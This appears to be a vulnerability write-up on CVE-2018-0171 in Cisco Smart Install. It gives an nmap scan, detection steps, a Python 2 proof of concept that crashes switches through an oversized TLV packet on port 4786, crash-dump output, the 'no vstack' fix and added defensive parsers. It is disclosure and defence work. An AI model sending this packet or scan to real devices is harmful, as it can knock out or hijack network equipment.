0x01 Introduction
A stack-based buffer overflow vulnerability was found in the Smart Install Client code; it lets an attacker execute arbitrary code remotely without any authentication. Cisco Smart Install is a "plug-and-play" configuration and image-management feature that makes deploying new switches easy. It lets a user place a Cisco switch at any location, install it into the network and power it on, with no further configuration required. An attacker who exploits the flaw can therefore take complete control of a vulnerable network device. Smart Install automates the initial configuration process and provisions new switches with the currently loaded operating-system image; it also keeps a hot-swappable real-time backup whenever the configuration changes. Note that the feature is enabled by default on clients.
0x02 Vulnerability Description
A stack buffer overflow (CVE-2018-0171) exists in the Smart Install Client code of Cisco IOS and IOS-XE. An attacker can remotely send a crafted packet to TCP port 4786 to trigger the overflow on the target device, causing a denial of service (DoS) or remote command execution, and thereby take control of the affected network device. TCP port 4786 is reportedly open by default on Cisco switches.
0x03 Checking for the Vulnerability
1. If your Cisco network device exposes TCP port 4786, it is vulnerable. To find such devices, scan the target network with nmap:
nmap -p T:4786 192.168.1.0/24
2. To check whether the Smart Install Client feature is enabled on a network device, look at the output of show vstack config. The following examples come from Cisco Catalyst switches configured as Smart Install clients:
switch1# show vstack config
Role: Client (SmartInstall enabled)

switch2# show vstack config
Capability: Client
Oper Mode: Enabled
Role: Client
Role: Client together with Oper Mode: Enabled, or Role: Client (SmartInstall enabled), in the show vstack config output confirms that the feature is enabled on the device.
3. Run the following command on the Cisco device: if port 4786 is listening, Smart Install (SMI) is in use.
switch>show tcp brief all
TCB       Local Address      Foreign Address    (state)
0344B794  *.4786             *.*                LISTEN
0350A018  *.443              *.*                LISTEN
03293634  *.443              *.*                LISTEN
03292D9C  *.80               *.*                LISTEN
03292504  *.80               *.*                LISTEN
Checking the Cisco IOS and IOS-XE software version:
Router> show version
Cisco IOS Software, C2951 Software (C2951-UNIVERSALK9-M), Version 15.5(2)T1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Mon 22-Jun-15 09:32 by prod_rel_team

ios-xe-device# show version
Cisco IOS Software, Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version Denali 16.2.1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Sun 27-Mar-16 21:47 by mcpre
4. If you are not sure whether your device is affected, use the Cisco IOS Software Checker:
https://tools.cisco.com/security/center/softwarechecker.x
5. Use the following script to probe whether the given IP and port really speak the Cisco SMI protocol:
https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py
The protocol fingerprint can be seen in the Metasploit module commit:
https://github.com/rapid7/metasploit-framework/commit/c67e407c9c5cd28d555e1c2614776e05b628749d
[INFO] Sending TCP probe to targetip:4786
[INFO] Smart Install Client feature active on targetip:4786
[INFO] targetip is affected
0x04 Affected Scope
Affected devices:
Catalyst 4500 Supervisor Engines
Cisco Catalyst 3850 Series Switches
Cisco Catalyst 2960 Series Switches
Devices that include a Smart Install Client may also be affected, including:
Catalyst 4500 Supervisor Engines
Catalyst 3850 Series
Catalyst 3750 Series
Catalyst 3650 Series
Catalyst 3560 Series
Catalyst 2960 Series
Catalyst 2975 Series
IE 2000
IE 3000
IE 3010
IE 4000
IE 4010
IE 5000
SM-ES2 SKUs
SM-ES3 SKUs
NME-16ES-1G-P
SM-X-ES3 SKUs
0x05 Vulnerability Verification
The following is the PoC for this vulnerability (Python 2):
import socket
import struct
from optparse import OptionParser

# Target selection: the Smart Install client address and its TCP port (4786 by default)
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1")
parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786)
(options, args) = parser.parse_args()

def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
    # 4-byte big-endian type, 4-byte big-endian length, then the value
    return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v

def send_packet(sock, packet):
    sock.send(packet)

def receive(sock):
    return sock.recv(4096)

if __name__ == "__main__":
    print "[*] Connecting to Smart Install Client ", options.target, "port", options.port
    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    con.connect((options.target, options.port))
    payload = 'BBBB' * 44
    shellcode = 'D' * 2048
    # The length field inside `data` claims far more bytes than actually follow it
    data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
    tlv_1 = craft_tlv(0x00000001, data)
    tlv_2 = shellcode
    # `hdr` (the Smart Install message header) is not defined anywhere in the PoC as published
    pkt = hdr + tlv_1 + tlv_2
    print "[*] Send a malicious packet"
    send_packet(con, pkt)
Run the following command against the switch:
host$ ./smi_ibc_init_discovery_BoF.py -t 192.168.1.1
The switch should print crash information and reboot:
00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 1200, PC = 42424240
-Traceback= 42424240
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15
=== Flushing messages (00:10:39 UTC Mon Mar 1 1993) === Buffered messages:
...
Queued messages:
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Wed 17-Aug-16 13:46 by prod_rel_team
Instruction TLB Miss Exception (0x1200)!
SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000
CPU Register Context:
Vector = 0x00001200 PC = 0x42424240 MSR = 0x00029230 CR = 0x33000053
LR = 0x42424242 CTR = 0x014D5268 XER = 0xC000006A
R0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4
R4 = 0x000000B6 R5 = 0x0000001E R6 = 0xAA3BEC00 R7 = 0x00000014
R8 = 0x0000001E R9 = 0x00000000 R10 = 0x001BA800 R11 = 0xFFFFFFFF
R12 = 0x00000000 R13 = 0x00110000 R14 = 0x0131E1A8 R15 = 0x02B1B1A8
R16 = 0x02B1B128 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x02B1B128
R20 = 0x02B1B128 R21 = 0x00000001 R22 = 0x02B1B128 R23 = 0x02B1B1A8
R24 = 0x00000001 R25 = 0x00000000 R26 = 0x42424242 R27 = 0x42424242
R28 = 0x42424242 R29 = 0x42424242 R30 = 0x42424242 R31 = 0x42424242
Stack trace:
PC = 0x42424240, SP = 0x02B1B0B0
Frame 00: SP = 0x42424242 PC = 0x42424242
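The crash dump above shows the program counter and link register filled with 0x42 ('B') bytes taken from the payload: the client copied more data than its buffer held because it trusted a length field carried in the packet. As an added educational example (not part of the original post or of the Embedi PoC), the parser below reads records in the type/length/value framing that craft_tlv produces and rejects any declared length that exceeds the bytes actually present or the receive buffer; the inner length field at offset 36 is inferred from how the PoC builds `data`, and the 1024-byte buffer limit is a constructed figure, neither taken from Cisco's code.

```python
import struct

TLV_HDR = '!II'        # 4-byte type then 4-byte length, as the PoC's craft_tlv packs them
TLV_HDR_LEN = struct.calcsize(TLV_HDR)
INNER_LEN_OFFSET = 36  # offset of the length field inside the PoC's `data` (inferred from the PoC)
RECV_BUF_LIMIT = 1024  # capacity of the fixed buffer this parser protects (constructed figure)

class TlvError(ValueError):
    """A TLV claims more bytes than are present or than the buffer can hold."""

def parse_tlvs(buf, limit=RECV_BUF_LIMIT):
    """Split buf into (type, value) records, refusing any declared length that overruns."""
    records, off = [], 0
    while off < len(buf):
        if len(buf) - off < TLV_HDR_LEN:
            raise TlvError('truncated TLV header at offset %d' % off)
        t, length = struct.unpack_from(TLV_HDR, buf, off)
        off += TLV_HDR_LEN
        if length > limit:
            raise TlvError('type 0x%08x declares %d bytes, buffer holds %d' % (t, length, limit))
        if length > len(buf) - off:
            raise TlvError('type 0x%08x declares %d bytes, only %d remain' % (t, length, len(buf) - off))
        records.append((t, buf[off:off + length]))
        off += length
    return records

def inner_length_consistent(value):
    """Return (declared, actual, ok) for the length field at offset 36 of a type-1 value.
    A copy that trusts `declared` without comparing it to `actual` is the overflow pattern."""
    if len(value) < INNER_LEN_OFFSET + 4:
        raise TlvError('type-1 value too short for an inner length field')
    (declared,) = struct.unpack_from('!I', value, INNER_LEN_OFFSET)
    actual = len(value) - INNER_LEN_OFFSET - 4
    return declared, actual, declared <= actual

def is_well_formed(buf, limit=RECV_BUF_LIMIT):
    """True only if every TLV is bounded and every type-1 inner length is honest."""
    try:
        return all(t != 1 or inner_length_consistent(v)[2] for t, v in parse_tlvs(buf, limit))
    except TlvError:
        return False

def poc_tlv_body():
    """The TLV part of the page's PoC, rebuilt as test input (hdr omitted, as on the page):
    36 x 'A', a length claiming 2264 bytes, 176 x 'B', then a 2048-byte blob that is no TLV."""
    payload, shellcode = b'BBBB' * 44, b'D' * 2048
    data = b'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
    return struct.pack(TLV_HDR, 1, len(data)) + data + shellcode
```

Fed the PoC body, the parser accepts the first record only as far as its outer length, flags the inner length (2264 declared against 176 present), and refuses the trailing 'D' blob whose "length" of 0x44444444 exceeds both the buffer and the data.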
0x06 Impact
An attacker could cause a buffer overflow on an affected device, which may have the following consequences:
Trigger a reload of the device
Allow the attacker to execute arbitrary code on the device
Put the affected device into an indefinite reboot loop, crashing it
0x07 Remediation
#conf t
Enter configuration commands, one per line. End with CNTL/Z.
NSJ-131-6-16-C2960_7(config)#no vstack
NSJ-131-6-16-C2960_7(config)#exit
The key command is no vstack.
Checking again, the port is now closed:
#show tcp brief all
TCB       Local Address      Foreign Address    (state)
075A0088  *.443              *.*                LISTEN
0759F6C8  *.443              *.*                LISTEN
0759ED08  *.80               *.*                LISTEN
0759E348  *.80               *.*                LISTEN
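The show vstack config and show tcp brief all checks from section 0x03, and the post-fix check above, can be scripted when auditing many devices. The following is an added example, not from the original post or from Cisco, that parses pasted command output; the samples are constructed, modelled on the outputs quoted in this post (the "Disabled" sample is assumed, not shown on the page).

```python
import re

# Constructed samples modelled on the show command output quoted in this post.
VSTACK_ENABLED_OLD = """switch1# show vstack config
Role: Client (SmartInstall enabled)
"""
VSTACK_ENABLED_NEW = """switch2# show vstack config
Capability: Client
Oper Mode: Enabled
Role: Client
"""
VSTACK_DISABLED = """switch3# show vstack config
Capability: Client
Oper Mode: Disabled
Role: Client
"""
TCP_BEFORE_FIX = """switch>show tcp brief all
TCB       Local Address      Foreign Address    (state)
0344B794  *.4786             *.*                LISTEN
0350A018  *.443              *.*                LISTEN
03292D9C  *.80               *.*                LISTEN
"""
TCP_AFTER_FIX = """#show tcp brief all
TCB       Local Address      Foreign Address    (state)
075A0088  *.443              *.*                LISTEN
0759ED08  *.80               *.*                LISTEN
"""

def vstack_enabled(vstack_output):
    """True if `show vstack config` shows the Smart Install client active, in either
    the older single-line form or the newer Capability/Oper Mode/Role form."""
    if re.search(r'^Role:\s*Client\s*\(SmartInstall enabled\)', vstack_output, re.M | re.I):
        return True
    role = re.search(r'^Role:\s*Client\s*$', vstack_output, re.M | re.I)
    oper = re.search(r'^Oper Mode:\s*Enabled\s*$', vstack_output, re.M | re.I)
    return bool(role and oper)

def listening_ports(tcp_output):
    """Local TCP ports in LISTEN state from `show tcp brief all` (TCB, *.port, *.*, state)."""
    listen = re.compile(r'^\s*[0-9A-F]{8}\s+\S+\.(\d+)\s+\S+\s+LISTEN\s*$', re.I)
    return {int(m.group(1)) for m in map(listen.match, tcp_output.splitlines()) if m}

def smi_exposed(vstack_output, tcp_output, smi_port=4786):
    """Flag a device if the feature is enabled or the SMI port is still listening."""
    return vstack_enabled(vstack_output) or smi_port in listening_ports(tcp_output)
```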
0x08 References
https://embedi.com/blog/cisco-smart-install-remote-code-execution/
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
https://www.anquanke.com/post/id/103122
https://mp.weixin.qq.com/s/cMYUuGFmox5PK89fO_eR8w
https://www.youtube.com/watch?v=CE7KNK6UJuk&feature=youtu.be&t=99
https://www.youtube.com/watch?v=TSg5EZVudNU&feature=youtu.be